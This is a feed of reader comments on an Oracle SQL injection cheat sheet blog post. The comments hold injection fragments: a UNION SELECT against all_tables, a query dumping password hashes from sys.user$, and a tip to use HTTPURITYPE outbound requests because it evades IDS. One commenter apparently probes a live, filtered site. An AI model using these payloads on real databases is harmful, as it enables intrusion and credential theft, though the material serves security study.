Ferruh Mavituna - Me, Myself and My Alter Ego... Ferruh Mavituna http://ferruh.mavituna.com Paz, 12 Şub 2012 16:41:50 +0200 http://ferruh.mavituna.com http://ferruh.mavituna.com/rss/rss.gif http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ deniz Per, 02 Ara 2010 17:44:21 +0200 can we use httpuritype in sql functions such as length without using select like<br /><br />length(HTTPURITYPE('http://www.red-database-security.com').getXML()) <br /><br />as in MSSQL queris like len(db_name()) http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ Yasin Özel Cum, 23 Nis 2010 16:47:52 +0200 Birde;<br /> UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 FROM all_tables<br />Yazdigimda ;<br />ifade kendisine kar&#254;&#253;l&#253;k gelen ifade ile ayn&#253; veri t&#252;r&#252;nde olmal&#253;d&#253;r <br /><br />hatasini veriyor. Neden kaynaklanir bu sorun http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ Yasin Özel Cum, 23 Nis 2010 16:45:40 +0200 Ferruh abi aynen dedigin gibi yapiyorum ama sanirsam mantiksal operat&#246;rlere karsi filitrelenmis.. &lt;&gt; = &lt; &gt; &gt;= &lt;= gibi operat&#246;rlen engellenmis. TABLESPACE_NAME = CHR(USERS) yaparken = oldugu i&#231;in sayfa hata sayfasina atiyor.. &quot;TABLESPACE_NAME = CHR(USERS)&quot; koymayincada<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80004005'<br /><br />[Oracle][ODBC][Ora]ORA-00936: eksik ifade <br /><br />hatasini veriyor.. Sence ne yapabilirim ? http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ harsh Çar, 10 Mar 2010 13:27:41 +0200 jhello...this is geat expierence /...... http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ rem7ter Cmt, 22 Kas 2008 08:43:02 +0200 thanks!but not sure that is useful http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ Deep Power Per, 16 Eki 2008 16:51:49 +0200 Ferruh abi iyi g&#252;zel de ingilizce.Ingilizcem o kadar iyi degildir.En iyisi sen bunu tr ye &#231;evir.Bir lise ogrencisi i&#231;in zor : )<br />Selametle... http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ Ferruh Mavituna Sal, 02 Eki 2007 23:42:22 +0200 Alexandar,<br />Thanks for your comments. I'm quite new in ORACLE stuff. I updated current list according to your comments. http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ Alexander Kornbrust Sal, 02 Eki 2007 22:18:19 +0200 Nice list but some of the statements are too complicated:<br /><br />e.g. <br /> SELECT username, FROM all_users UNION SELECT name, password FROM sys.user$<br />better: SELECT name, password FROM sys.user$ where type#=1<br /><br />or<br />use httpuritype instead of utl_http. utl_http is often removed from public. httpuritype works also and is not flagged by IDS:<br /> SELECT HTTPURITYPE('http://www.red-database-security.com').getXML() FROM DUAL;<br /><br />